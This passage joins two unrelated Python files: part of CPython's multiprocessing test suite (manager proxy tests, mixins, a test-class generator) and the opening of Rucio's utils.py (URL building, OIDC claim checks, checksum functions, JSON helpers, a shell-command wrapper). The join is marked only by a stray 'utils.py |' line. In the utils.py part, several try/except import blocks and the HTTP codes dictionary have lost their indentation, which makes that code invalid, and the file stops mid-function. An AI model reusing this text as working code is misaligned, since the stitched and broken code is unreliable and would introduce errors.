    def test_list(self):
        o = self.manager.list()
        o.append(5)
        self.run_worker(self._test_list, o)
        assert o[1] == 6
    """
    manager_class = multiprocessing.managers.SyncManager

    def setUp(self):
        # One manager per test; self.proc holds the current worker child.
        self.manager = self.manager_class()
        self.manager.start()
        self.proc = None

    def tearDown(self):
        if self.proc is not None and self.proc.is_alive():
            self.proc.terminate()
            self.proc.join()
        self.manager.shutdown()
        self.manager = None
        self.proc = None

    @classmethod
    def setUpClass(cls):
        support.reap_children()

    tearDownClass = setUpClass

    def wait_proc_exit(self):
        # Only the manager process should be returned by active_children()
        # but this can take a bit on slow machines, so wait a few seconds
        # if there are other children too (see #17395).
        join_process(self.proc)
        start_time = time.monotonic()
        t = 0.01
        while len(multiprocessing.active_children()) > 1:
            time.sleep(t)
            t *= 2
            dt = time.monotonic() - start_time
            if dt >= 5.0:
                test.support.environment_altered = True
                print("Warning -- multiprocessing.Manager still has %s active "
                      "children after %s seconds"
                      % (multiprocessing.active_children(), dt),
                      file=sys.stderr)
                break

    def run_worker(self, worker, obj):
        # Run *worker* on *obj* in a child and require a clean exit.
        self.proc = multiprocessing.Process(target=worker, args=(obj, ))
        self.proc.daemon = True
        self.proc.start()
        self.wait_proc_exit()
        self.assertEqual(self.proc.exitcode, 0)

    @classmethod
    def _test_queue(cls, obj):
        assert obj.qsize() == 2
        assert obj.full()
        assert not obj.empty()
        assert obj.get() == 5
        assert not obj.empty()
        assert obj.get() == 6
        assert obj.empty()

    def test_queue(self, qname="Queue"):
        o = getattr(self.manager, qname)(2)
        o.put(5)
        o.put(6)
        self.run_worker(self._test_queue, o)
        assert o.empty()
        assert not o.full()

    def test_joinable_queue(self):
        self.test_queue("JoinableQueue")

    @classmethod
    def _test_event(cls, obj):
        assert obj.is_set()
        obj.wait()
        obj.clear()
        obj.wait(0.001)

    def test_event(self):
        o = self.manager.Event()
        o.set()
        self.run_worker(self._test_event, o)
        assert not o.is_set()
        o.wait(0.001)

    @classmethod
    def _test_lock(cls, obj):
        obj.acquire()

    def test_lock(self, lname="Lock"):
        o = getattr(self.manager, lname)()
        self.run_worker(self._test_lock, o)
        o.release()
        self.assertRaises(RuntimeError, o.release)  # already released

    @classmethod
    def _test_rlock(cls, obj):
        obj.acquire()
        obj.release()

    def test_rlock(self, lname="Lock"):
        o = getattr(self.manager, lname)()
        self.run_worker(self._test_rlock, o)

    @classmethod
    def _test_semaphore(cls, obj):
        obj.acquire()

    def test_semaphore(self, sname="Semaphore"):
        o = getattr(self.manager, sname)()
        self.run_worker(self._test_semaphore, o)
        o.release()

    def test_bounded_semaphore(self):
        self.test_semaphore(sname="BoundedSemaphore")

    @classmethod
    def _test_condition(cls, obj):
        obj.acquire()
        obj.release()

    def test_condition(self):
        o = self.manager.Condition()
        self.run_worker(self._test_condition, o)

    @classmethod
    def _test_barrier(cls, obj):
        assert obj.parties == 5
        obj.reset()

    def test_barrier(self):
        o = self.manager.Barrier(5)
        self.run_worker(self._test_barrier, o)

    @classmethod
    def _test_pool(cls, obj):
        # TODO: fix https://bugs.python.org/issue35919
        with obj:
            pass

    def test_pool(self):
        o = self.manager.Pool(processes=4)
        self.run_worker(self._test_pool, o)

    @classmethod
    def _test_list(cls, obj):
        assert obj[0] == 5
        assert obj.count(5) == 1
        assert obj.index(5) == 0
        obj.sort()
        obj.reverse()
        for x in obj:
            pass
        assert len(obj) == 1
        assert obj.pop(0) == 5

    def test_list(self):
        o = self.manager.list()
        o.append(5)
        self.run_worker(self._test_list, o)
        assert not o
        self.assertEqual(len(o), 0)

    @classmethod
    def _test_dict(cls, obj):
        assert len(obj) == 1
        assert obj['foo'] == 5
        assert obj.get('foo') == 5
        assert list(obj.items()) == [('foo', 5)]
        assert list(obj.keys()) == ['foo']
        assert list(obj.values()) == [5]
        assert obj.copy() == {'foo': 5}
        assert obj.popitem() == ('foo', 5)

    def test_dict(self):
        o = self.manager.dict()
        o['foo'] = 5
        self.run_worker(self._test_dict, o)
        assert not o
        self.assertEqual(len(o), 0)

    @classmethod
    def _test_value(cls, obj):
        assert obj.value == 1
        assert obj.get() == 1
        obj.set(2)

    def test_value(self):
        o = self.manager.Value('i', 1)
        self.run_worker(self._test_value, o)
        self.assertEqual(o.value, 2)
        self.assertEqual(o.get(), 2)

    @classmethod
    def _test_array(cls, obj):
        assert obj[0] == 0
        assert obj[1] == 1
        assert len(obj) == 2
        assert list(obj) == [0, 1]

    def test_array(self):
        o = self.manager.Array('i', [0, 1])
        self.run_worker(self._test_array, o)

    @classmethod
    def _test_namespace(cls, obj):
        assert obj.x == 0
        assert obj.y == 1

    def test_namespace(self):
        o = self.manager.Namespace()
        o.x = 0
        o.y = 1
        self.run_worker(self._test_namespace, o)
#
# Mixins
#
class BaseMixin(object):
    """Mixin that records dangling processes/threads at class setup so
    tearDownClass can warn about leaks the tests introduced."""

    @classmethod
    def setUpClass(cls):
        cls.dangling = (multiprocessing.process._dangling.copy(),
                        threading._dangling.copy())

    @classmethod
    def tearDownClass(cls):
        # bpo-26762: Some multiprocessing objects like Pool create reference
        # cycles. Trigger a garbage collection to break these cycles.
        test.support.gc_collect()

        processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
        if processes:
            test.support.environment_altered = True
            print('Warning -- Dangling processes: %s' % processes,
                  file=sys.stderr)
        processes = None

        threads = set(threading._dangling) - set(cls.dangling[1])
        if threads:
            test.support.environment_altered = True
            print('Warning -- Dangling threads: %s' % threads,
                  file=sys.stderr)
        threads = None
class ProcessesMixin(BaseMixin):
    """Mixin binding the test-case API to real multiprocessing types."""
    TYPE = 'processes'
    Process = multiprocessing.Process
    connection = multiprocessing.connection
    current_process = staticmethod(multiprocessing.current_process)
    active_children = staticmethod(multiprocessing.active_children)
    Pool = staticmethod(multiprocessing.Pool)
    Pipe = staticmethod(multiprocessing.Pipe)
    Queue = staticmethod(multiprocessing.Queue)
    JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
    Lock = staticmethod(multiprocessing.Lock)
    RLock = staticmethod(multiprocessing.RLock)
    Semaphore = staticmethod(multiprocessing.Semaphore)
    BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
    Condition = staticmethod(multiprocessing.Condition)
    Event = staticmethod(multiprocessing.Event)
    Barrier = staticmethod(multiprocessing.Barrier)
    Value = staticmethod(multiprocessing.Value)
    Array = staticmethod(multiprocessing.Array)
    RawValue = staticmethod(multiprocessing.RawValue)
    RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
    """Mixin binding the test-case API to manager proxies; each type is
    looked up lazily on the shared manager created in setUpClass()."""
    TYPE = 'manager'
    Process = multiprocessing.Process
    Queue = property(operator.attrgetter('manager.Queue'))
    JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
    Lock = property(operator.attrgetter('manager.Lock'))
    RLock = property(operator.attrgetter('manager.RLock'))
    Semaphore = property(operator.attrgetter('manager.Semaphore'))
    BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
    Condition = property(operator.attrgetter('manager.Condition'))
    Event = property(operator.attrgetter('manager.Event'))
    Barrier = property(operator.attrgetter('manager.Barrier'))
    Value = property(operator.attrgetter('manager.Value'))
    Array = property(operator.attrgetter('manager.Array'))
    list = property(operator.attrgetter('manager.list'))
    dict = property(operator.attrgetter('manager.dict'))
    Namespace = property(operator.attrgetter('manager.Namespace'))

    @classmethod
    def Pool(cls, *args, **kwds):
        return cls.manager.Pool(*args, **kwds)

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        cls.manager = multiprocessing.Manager()

    @classmethod
    def tearDownClass(cls):
        # only the manager process should be returned by active_children()
        # but this can take a bit on slow machines, so wait a few seconds
        # if there are other children too (see #17395)
        start_time = time.monotonic()
        t = 0.01
        while len(multiprocessing.active_children()) > 1:
            time.sleep(t)
            t *= 2
            dt = time.monotonic() - start_time
            if dt >= 5.0:
                test.support.environment_altered = True
                print("Warning -- multiprocessing.Manager still has %s active "
                      "children after %s seconds"
                      % (multiprocessing.active_children(), dt),
                      file=sys.stderr)
                break

        gc.collect()                       # do garbage collection
        if cls.manager._number_of_objects() != 0:
            # This is not really an error since some tests do not
            # ensure that all processes which hold a reference to a
            # managed object have been joined.
            test.support.environment_altered = True
            print('Warning -- Shared objects which still exist at manager '
                  'shutdown:')
            print(cls.manager._debug_info())
        cls.manager.shutdown()
        cls.manager.join()
        cls.manager = None

        super().tearDownClass()
class ThreadsMixin(BaseMixin):
    """Mixin binding the test-case API to multiprocessing.dummy (threads)."""
    TYPE = 'threads'
    Process = multiprocessing.dummy.Process
    connection = multiprocessing.dummy.connection
    current_process = staticmethod(multiprocessing.dummy.current_process)
    active_children = staticmethod(multiprocessing.dummy.active_children)
    Pool = staticmethod(multiprocessing.dummy.Pool)
    Pipe = staticmethod(multiprocessing.dummy.Pipe)
    Queue = staticmethod(multiprocessing.dummy.Queue)
    JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
    Lock = staticmethod(multiprocessing.dummy.Lock)
    RLock = staticmethod(multiprocessing.dummy.RLock)
    Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
    BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
    Condition = staticmethod(multiprocessing.dummy.Condition)
    Event = staticmethod(multiprocessing.dummy.Event)
    Barrier = staticmethod(multiprocessing.dummy.Barrier)
    Value = staticmethod(multiprocessing.dummy.Value)
    Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
    """Generate concrete TestCase classes for *start_method* from the base
    test classes in this module and install them into *remote_globs*,
    together with setUpModule/tearDownModule fixtures."""
    __module__ = remote_globs['__name__']
    local_globs = globals()
    ALL_TYPES = {'processes', 'threads', 'manager'}

    for name, base in local_globs.items():
        if not isinstance(base, type):
            continue
        if issubclass(base, BaseTestCase):
            if base is BaseTestCase:
                continue
            assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
            for type_ in base.ALLOWED_TYPES:
                # e.g. _TestFoo + ProcessesMixin -> WithProcessesTestFoo
                newname = 'With' + type_.capitalize() + name[1:]
                Mixin = local_globs[type_.capitalize() + 'Mixin']
                class Temp(base, Mixin, unittest.TestCase):
                    pass
                Temp.__name__ = Temp.__qualname__ = newname
                Temp.__module__ = __module__
                remote_globs[newname] = Temp
        elif issubclass(base, unittest.TestCase):
            # Plain TestCases are re-exported unchanged (fresh subclass).
            class Temp(base, object):
                pass
            Temp.__name__ = Temp.__qualname__ = name
            Temp.__module__ = __module__
            remote_globs[name] = Temp

    dangling = [None, None]
    old_start_method = [None]

    def setUpModule():
        multiprocessing.set_forkserver_preload(PRELOAD)
        multiprocessing.process._cleanup()
        dangling[0] = multiprocessing.process._dangling.copy()
        dangling[1] = threading._dangling.copy()
        old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
        try:
            multiprocessing.set_start_method(start_method, force=True)
        except ValueError:
            raise unittest.SkipTest(start_method +
                                    ' start method not supported')

        if sys.platform.startswith("linux"):
            try:
                lock = multiprocessing.RLock()
            except OSError:
                raise unittest.SkipTest("OSError raises on RLock creation, "
                                        "see issue 3111!")
        check_enough_semaphores()
        util.get_temp_dir()     # creates temp directory
        multiprocessing.get_logger().setLevel(LOG_LEVEL)

    def tearDownModule():
        need_sleep = False

        # bpo-26762: Some multiprocessing objects like Pool create reference
        # cycles. Trigger a garbage collection to break these cycles.
        test.support.gc_collect()

        multiprocessing.set_start_method(old_start_method[0], force=True)
        # pause a bit so we don't get warning about dangling threads/processes
        processes = set(multiprocessing.process._dangling) - set(dangling[0])
        if processes:
            need_sleep = True
            test.support.environment_altered = True
            print('Warning -- Dangling processes: %s' % processes,
                  file=sys.stderr)
        processes = None

        threads = set(threading._dangling) - set(dangling[1])
        if threads:
            need_sleep = True
            test.support.environment_altered = True
            print('Warning -- Dangling threads: %s' % threads,
                  file=sys.stderr)
        threads = None

        # Sleep 500 ms to give time to child processes to complete.
        if need_sleep:
            time.sleep(0.5)
        multiprocessing.process._cleanup()
        test.support.gc_collect()

    remote_globs['setUpModule'] = setUpModule
    remote_globs['tearDownModule'] = tearDownModule
|
utils.py | # -*- coding: utf-8 -*-
# Copyright 2012-2020 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2020
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2020
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2020
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Tomas Javurek <tomas.javurek@cern.ch>, 2019-2020
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - James Perry <j.perry@epcc.ed.ac.uk>, 2019
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@cern.ch>, 2019-2020
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
from __future__ import print_function
import base64
import copy
import datetime
import errno
import getpass
import hashlib
import imp
import json
import os
import os.path
import re
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from logging import getLogger, Formatter
from logging.handlers import RotatingFileHandler
from uuid import uuid4 as uuid
from xml.etree import ElementTree
import requests
from six import string_types, text_type, PY3
from rucio.common.config import config_get
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError, RucioException
from rucio.common.types import InternalAccount, InternalScope
try:
# Python 2
from itertools import izip_longest
except ImportError:
# Python 3
from itertools import zip_longest as izip_longest
try:
# Python 2
from urllib import urlencode, quote
except ImportError:
# Python 3
from urllib.parse import urlencode, quote
try:
# Python 2
from StringIO import StringIO
except ImportError:
# Python 3
from io import StringIO
try:
# Python 2
import urlparse
except ImportError:
# Python 3
import urllib.parse as urlparse
# Extra modules: Only imported if available
EXTRA_MODULES = {'paramiko': False}

# Probe for the optional enum support from the Rucio DB layer.
try:
    from rucio.db.sqla.enum import EnumSymbol
    EXTRA_MODULES['rucio.db.sqla.enum'] = True
except ImportError:
    EXTRA_MODULES['rucio.db.sqla.enum'] = False

# Probe every registered optional module with imp.find_module.
# NOTE(review): imp.find_module does not handle dotted names, so the
# 'rucio.db.sqla.enum' entry set by the try/except above is likely reset
# to False here even when the import succeeded — verify intent.
for extra_module in EXTRA_MODULES:
    try:
        imp.find_module(extra_module)
        EXTRA_MODULES[extra_module] = True
    except ImportError:
        EXTRA_MODULES[extra_module] = False

# paramiko can be found on disk yet still fail to import (e.g. broken
# crypto backend); downgrade it to unavailable in that case.
if EXTRA_MODULES['paramiko']:
    try:
        from paramiko import RSAKey
    except Exception:
        EXTRA_MODULES['paramiko'] = False
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def build_url(url, path=None, params=None, doseq=False):
    """
    Utility function to build an url for requests to the rucio system.

    If the optional parameter doseq evaluates to True, individual key=value
    pairs separated by '&' are generated for each element of the value
    sequence for the key.
    """
    pieces = [url]
    if path is not None:
        pieces.append("/" + path)
    if params is not None:
        pieces.append("?")
        if isinstance(params, str):
            pieces.append(quote(params))
        else:
            pieces.append(urlencode(params, doseq=doseq))
    return "".join(pieces)
def oidc_identity_string(sub, iss):
    """
    Transform IdP sub claim and issuers url into users identity string.

    :param sub: users SUB claim from the Identity Provider
    :param iss: issuer (IdP) https url
    :returns: OIDC identity string "SUB=<usersid>, ISS=https://iam-test.ch/"
    """
    return 'SUB={0}, ISS={1}'.format(sub, iss)
def sqlalchemy_obj_to_dict(sqlalchemyresult):
    """
    Makes dictionary from SQLAlchemy query result object.

    :param sqlalchemyresult: object exposing its column values via __dict__
    :returns: dictionary (deep copy, without SQLAlchemy bookkeeping state)
    """
    attributes = dict(sqlalchemyresult.__dict__)
    result = copy.deepcopy(attributes)
    result.pop('_sa_instance_state')
    return result
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
    """
    Checks if both of the following statements are true:
    - all items in required_scope are present in scope string
    - all items in required_audience are present in audience
    Returns False otherwise. audience and scope must be both strings
    or both lists. Similarly for required_* variables.

    :params scope: list of strings or one string where items are separated by a separator input variable
    :params audience: list of strings or one string where items are separated by a separator input variable
    :params required_scope: list of strings or one string where items are separated by a separator input variable
    :params required_audience: list of strings or one string where items are separated by a separator input variable
    :params sepatator: separator string, space by default (name keeps its
        historical spelling for backward compatibility with keyword callers)
    :returns : True or False
    """
    # Normalize falsy inputs to empty strings so the type dispatch below
    # treats them as "nothing required"/"nothing granted".
    if not scope:
        scope = ""
    if not audience:
        audience = ""
    if not required_scope:
        required_scope = ""
    if not required_audience:
        required_audience = ""
    # Case 1: everything is a list.
    if (isinstance(scope, list) and isinstance(audience, list) and  # NOQA: W504
            isinstance(required_scope, list) and isinstance(required_audience, list)):
        scope = [str(it) for it in scope]
        audience = [str(it) for it in audience]
        required_scope = [str(it) for it in required_scope]
        required_audience = [str(it) for it in required_audience]
        req_scope_present = all(elem in scope for elem in required_scope)
        req_audience_present = all(elem in audience for elem in required_audience)
        return req_scope_present and req_audience_present
    # Case 2: everything is a string; split on the separator.
    elif (isinstance(scope, string_types) and isinstance(audience, string_types) and  # NOQA: W504
            isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
        scope = str(scope)
        audience = str(audience)
        required_scope = str(required_scope)
        required_audience = str(required_audience)
        req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
        req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
        return req_scope_present and req_audience_present
    # Case 3: granted claims are lists, required claims are strings.
    elif (isinstance(scope, list) and isinstance(audience, list) and  # NOQA: W504
            isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
        scope = [str(it) for it in scope]
        audience = [str(it) for it in audience]
        required_scope = str(required_scope)
        required_audience = str(required_audience)
        req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
        req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
        return req_scope_present and req_audience_present
    # Case 4: granted claims are strings, required claims are lists.
    elif (isinstance(scope, string_types) and isinstance(audience, string_types) and  # NOQA: W504
            isinstance(required_scope, list) and isinstance(required_audience, list)):
        scope = str(scope)
        audience = str(audience)
        required_scope = [str(it) for it in required_scope]
        required_audience = [str(it) for it in required_audience]
        req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
        req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
        return req_scope_present and req_audience_present
    # Mixed list/string combinations other than the above are rejected.
    else:
        return False
def generate_uuid():
    """Return a new random UUID as a 32-character lowercase hex string."""
    return uuid().hex.lower()
def generate_uuid_bytes():
    """Return a new random UUID as its raw 16 bytes."""
    new_uuid = uuid()
    return new_uuid.bytes
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'


def is_checksum_valid(checksum_name):
    """
    Check whether a checksum algorithm is supported.

    Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.

    :param checksum_name: The name of the checksum to be verified.
    :returns: True if checksum_name is supported, False otherwise.
    """
    supported = set(GLOBALLY_SUPPORTED_CHECKSUMS)
    return checksum_name in supported
def set_checksum_value(file, checksum_names_list):
    """For every supported checksum present and non-empty in
    file['metadata'], set file['checksum'] to 'NAME:value'; stop as soon
    as the preferred checksum has been applied."""
    metadata = file['metadata']
    for checksum_name in checksum_names_list:
        if checksum_name in metadata.keys() and metadata[checksum_name]:
            file['checksum'] = '%s:%s' % (checksum_name.upper(), str(metadata[checksum_name]))
            if checksum_name == PREFERRED_CHECKSUM:
                break
def adler32(file):
    """
    Compute the Adler-32 checksum of a file.

    An Adler-32 checksum is obtained by calculating two 16-bit checksums A and
    B and concatenating their bits into a 32-bit integer. A is the sum of all
    bytes in the stream plus one, and B is the sum of the individual values of
    A from each step.

    :param file: file name
    :returns: Hexified string, padded to 8 values.
    """
    checksum = 1  # adler starting value is _not_ 0
    try:
        with open(file, 'rb') as stream:
            for chunk in stream:
                checksum = zlib.adler32(chunk, checksum)
    except Exception as error:
        raise Exception('FATAL - could not get Adler32 checksum of file %s - %s' % (file, error))
    # backflip on 32bit
    if checksum < 0:
        checksum += 2 ** 32
    return str('%08x' % checksum)
CHECKSUM_ALGO_DICT['adler32'] = adler32
def md5(file):
    """
    Runs the MD5 algorithm (RFC-1321) on the binary content of the file
    named file and returns the hexadecimal digest.

    :param file: file name
    :returns: string of 32 hexadecimal digits
    """
    digest = hashlib.md5()
    try:
        with open(file, "rb") as stream:
            # Feed the hash in 4 KiB chunks so large files fit in memory.
            for chunk in iter(lambda: stream.read(4096), b""):
                digest.update(chunk)
    except Exception as error:
        raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, error))
    return digest.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
    """
    Runs the SHA256 algorithm on the binary content of the file named file
    and returns the hexadecimal digest.

    :param file: file name
    :returns: string of 64 hexadecimal digits
    """
    # Fixes over the previous version: removed a leftover debug print of the
    # digest, stopped shadowing the builtin `bytes`, and read the file in
    # chunks instead of loading it entirely into memory.
    hash_sha256 = hashlib.sha256()
    with open(file, "rb") as f:
        for chunk in iter(lambda: f.read(4096), b""):
            hash_sha256.update(chunk)
    return hash_sha256.hexdigest()
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
    """
    Runs the CRC32 algorithm on the binary content of the file named file
    and returns the hexadecimal digest.

    :param file: file name
    :returns: uppercase hexadecimal digest (up to 8 hex digits)
    """
    # Fix: the previous version opened the file without ever closing it,
    # leaking a file handle on every call. Use a context manager.
    prev = 0
    with open(file, "rb") as f:
        for chunk in f:
            prev = zlib.crc32(chunk, prev)
    return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
def str_to_date(string):
    """Converts a RFC-1123 string to the corresponding datetime value.

    :param string: the RFC-1123 string to convert to datetime value.
    """
    if not string:
        return None
    return datetime.datetime.strptime(string, DATE_FORMAT)
def val_to_space_sep_str(vallist):
    """Converts a list of values into a string of space separated values.

    :param vallist: the list of values to to convert into string
    :return: the string of space separated values or the value initially passed as parameter
    """
    try:
        if isinstance(vallist, list):
            return text_type(" ".join(vallist))
        else:
            return text_type(vallist)
    # Fix: was a bare `except:`, which also swallowed SystemExit and
    # KeyboardInterrupt. Narrowed to Exception; the best-effort fallback
    # (e.g. joining non-string items raises TypeError) is preserved.
    except Exception:
        return text_type('')
def date_to_str(date):
    """Converts a datetime value to the corresponding RFC-1123 string.

    :param date: the datetime value to convert.
    """
    return None if not date else datetime.datetime.strftime(date, DATE_FORMAT)
class APIEncoder(json.JSONEncoder):
    """Proprietary JSONEncoder subclass used by the json render function.

    This is needed to address the encoding of special values.
    """

    def default(self, obj):  # pylint: disable=E0202
        if isinstance(obj, datetime.datetime):
            # convert any datetime to RFC 1123 format
            return date_to_str(obj)
        if isinstance(obj, (datetime.time, datetime.date)):
            # should not happen since the only supported date-like format
            # supported at dmain schema level is 'datetime' .
            return obj.isoformat()
        if isinstance(obj, datetime.timedelta):
            return obj.days * 24 * 60 * 60 + obj.seconds
        if isinstance(obj, EnumSymbol):
            return obj.description
        if isinstance(obj, (InternalAccount, InternalScope)):
            return obj.external
        return json.JSONEncoder.default(self, obj)
def render_json(**data):
    """Render the given keyword arguments as a JSON object string."""
    encoded = json.dumps(data, cls=APIEncoder)
    return encoded


def render_json_list(l):
    """Render the given list as a JSON array string."""
    encoded = json.dumps(l, cls=APIEncoder)
    return encoded
def datetime_parser(dct):
    """JSON object hook: convert string values that look like RFC-1123
    dates (they contain " UTC") into datetime objects, in place."""
    for key, value in list(dct.items()):
        if not isinstance(value, string_types):
            continue
        if re.search(" UTC", value):
            try:
                dct[key] = datetime.datetime.strptime(value, DATE_FORMAT)
            except Exception:
                # Leave the value untouched when it only resembles a date.
                pass
    return dct
def parse_response(data):
    """Parse a JSON response body (bytes or str) into Python objects,
    reviving RFC-1123 date strings as datetimes."""
    try:
        decoded = data.decode('utf-8')
    except AttributeError:
        # Already a str.
        decoded = data
    return json.loads(decoded, object_hook=datetime_parser)
def execute(cmd, blocking=True):
    """
    Executes a command in a subprocess. Returns a tuple
    of (exitcode, out, err), where out is the string output
    from stdout and err is the string output from stderr when
    executing the command.

    When blocking is False the Popen object is returned instead.

    :param cmd: Command string to execute
    """
    process = subprocess.Popen(cmd,
                               shell=True,
                               stdin=subprocess.PIPE,
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE)
    if not blocking:
        return process
    out, err = process.communicate()
    return process.returncode, out, err
def rse_supported_protocol_operations():
    """ Returns a list with operations supported by all RSE protocols."""
    operations = ['read', 'write', 'delete', 'third_party_copy']
    return operations
def rse_supported_protocol_domains():
    """ Returns a list with all supported RSE protocol domains."""
    domains = ['lan', 'wan']
    return domains
def grouper(iterable, n, fillvalue=None):
    """ Collect data into fixed-length chunks or blocks.

    grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
    """
    # n references to the same iterator advance it in lockstep
    iterators = [iter(iterable)] * n
    return izip_longest(*iterators, fillvalue=fillvalue)
def chunks(l, n):
    """
    Yield successive n-sized chunks from l.
    """
    start = 0
    while start < len(l):
        yield l[start:start + n]
        start += n
def my_key_generator(namespace, fn, **kw):
    """
    Customized key generator for dogpile.

    :param namespace: cache namespace prefix.
    :param fn: the cached function (its __name__ becomes part of the key).
    :returns: a key-generating callable accepting the cached call's arguments.
    """
    fname = fn.__name__

    def generate_key(*arg, **kw):
        # NOTE: truthy positional arguments are joined with '_' and appended
        # directly after '<namespace>_<fname>' (no separator in between)
        non_empty = (str(s) for s in arg if s)
        return namespace + "_" + fname + "_".join(non_empty)
    return generate_key
def get_logger(name):
    """ Build a logger writing to a size-rotated file in the configured log directory.

    :param name: logger name; also used as the log file basename.
    :returns: a logging.Logger with a RotatingFileHandler attached.
    """
    logger = getLogger(name)
    # rotate at ~1 GB per file, keeping up to 10 backups
    hdlr = RotatingFileHandler('%s/%s.log' % (config_get('common', 'logdir'), name), maxBytes=1000000000, backupCount=10)
    formatter = Formatter('%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
    hdlr.setFormatter(formatter)
    logger.addHandler(hdlr)
    # level name is read from the 'common/loglevel' config option
    logger.setLevel(config_get('common', 'loglevel').upper())
    return logger
def construct_surl_DQ2(dsn, filename):
    """
    Defines relative SURL for new replicas. This method
    contains DQ2 convention. To be used for non-deterministic sites.
    Method imported from DQ2.

    :param dsn: the dataset name (dot-separated fields).
    :param filename: the file name to append to the path.
    @return: relative SURL for new replica.
    @rtype: str
    """
    # check how many dots in dsn
    fields = dsn.split('.')
    nfields = len(fields)
    if nfields == 0:
        # NOTE(review): unreachable — str.split always returns >= 1 element
        return '/other/other/%s' % (filename)
    elif nfields == 1:
        stripped_dsn = __strip_dsn(dsn)
        return '/other/%s/%s' % (stripped_dsn, filename)
    elif nfields == 2:
        project = fields[0]
        stripped_dsn = __strip_dsn(dsn)
        return '/%s/%s/%s' % (project, stripped_dsn, filename)
    elif nfields < 5 or re.match('user*|group*', fields[0]):
        # NOTE(review): 'user*|group*' matches 'use'/'grou' plus any number of
        # trailing 'r'/'p' characters — presumably 'user.*|group.*' was
        # intended; confirm before changing, callers may rely on current behavior
        project = fields[0]
        f2 = fields[1]
        f3 = fields[2]
        stripped_dsn = __strip_dsn(dsn)
        return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
    else:
        # 5+ fields: use field 5 as dataset type and the (stripped) last field as tag
        project = fields[0]
        dataset_type = fields[4]
        if nfields == 5:
            tag = 'other'
        else:
            tag = __strip_tag(fields[-1])
        stripped_dsn = __strip_dsn(dsn)
        return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
    """
    Defines relative SURL for new replicas. This method
    contains Tier0 convention. To be used for non-deterministic sites.

    :param dsn: the dataset name (dot-separated fields).
    :param filename: the file name to append to the path.
    @return: relative SURL for new replica.
    @rtype: str
    """
    fields = dsn.split('.')
    nfields = len(fields)
